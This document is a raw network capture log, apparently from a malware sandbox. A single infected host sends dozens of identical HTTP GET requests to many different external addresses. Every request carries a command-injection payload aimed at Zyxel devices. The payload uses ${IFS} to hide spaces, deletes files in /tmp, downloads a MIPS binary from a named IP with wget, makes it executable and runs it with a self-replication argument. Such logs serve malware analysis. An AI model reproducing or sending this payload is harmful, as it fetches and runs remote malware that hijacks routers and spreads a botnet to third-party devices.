                                            Jan 14, 2024 15:50:36.355170012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3387192.168.2.2335394216.150.232.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355199099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3388192.168.2.2350382169.143.3.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355211973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3389192.168.2.233493642.247.101.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355272055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3390192.168.2.2340502212.37.189.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355298042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3391192.168.2.235874488.186.50.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355320930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3392192.168.2.233370858.43.162.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355365992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3393192.168.2.2335708163.252.136.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355386972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3394192.168.2.235108439.80.217.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355402946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3395192.168.2.2347478168.201.37.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355460882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3396192.168.2.2343310183.244.45.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355480909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3397192.168.2.2349442180.101.115.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355530977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3398192.168.2.2349534184.160.131.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355561972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3399192.168.2.2341496223.73.176.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355592966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3400192.168.2.2339080183.173.22.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355618000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3401192.168.2.234718465.137.18.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355639935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3402192.168.2.234959865.243.240.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355667114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3403192.168.2.2341632134.254.185.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355705976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3404192.168.2.233701279.94.101.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355747938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3405192.168.2.2348188134.147.157.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355783939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3406192.168.2.2342698209.124.153.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355808020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3407192.168.2.234693447.45.72.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355825901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3408192.168.2.23365849.117.51.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355855942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3409192.168.2.2343060157.0.41.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355890036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3410192.168.2.2359198111.155.118.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355916977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3411192.168.2.2356172185.40.58.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355946064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3412192.168.2.2357666146.68.165.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355989933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3413192.168.2.233726895.35.215.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355993032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3414192.168.2.235936632.92.207.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356029987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3415192.168.2.2348546187.117.94.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356054068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3416192.168.2.233538814.226.22.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356100082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3417192.168.2.2343390117.132.219.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356129885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3418192.168.2.235140870.115.135.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356188059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3419192.168.2.2347824105.53.40.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356219053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3420192.168.2.2352084198.147.60.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356237888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3421192.168.2.2352870142.40.228.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356267929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3422192.168.2.2334604177.34.187.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356300116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3423192.168.2.2333802170.82.242.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356313944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3424192.168.2.233645425.38.176.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356343985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3425192.168.2.235233663.27.226.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356373072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3426192.168.2.2335970134.105.68.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356410980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3427192.168.2.2352838151.191.67.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356461048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3428192.168.2.2342428193.9.141.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356486082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3429192.168.2.233660894.24.62.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356513023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3430192.168.2.2351798100.222.56.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356537104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3431192.168.2.235945884.114.80.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356570005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3432192.168.2.2342032172.228.206.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356580973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3433192.168.2.2346048182.34.235.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356625080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3434192.168.2.2337966172.247.194.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356642008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3435192.168.2.233621043.238.45.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356669903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3436192.168.2.233428263.139.253.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356707096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3437192.168.2.2346754197.71.34.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356729984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3438192.168.2.2353878221.173.49.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356772900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3439192.168.2.2359530103.74.66.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356789112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3440192.168.2.2334944108.230.110.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356822968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3441192.168.2.2334312148.63.50.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356848955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3442192.168.2.235715897.101.41.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356889009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3443192.168.2.2340696156.235.228.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356900930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3444192.168.2.2341668101.158.10.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.356939077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3445192.168.2.2355132128.144.239.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357141018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3446192.168.2.2345030149.69.203.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357180119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3447192.168.2.2358992146.10.52.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357223034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3448192.168.2.236081294.243.59.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357239962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3449192.168.2.2343872183.15.12.207443
                                            TimestampBytes transferredDirectionData
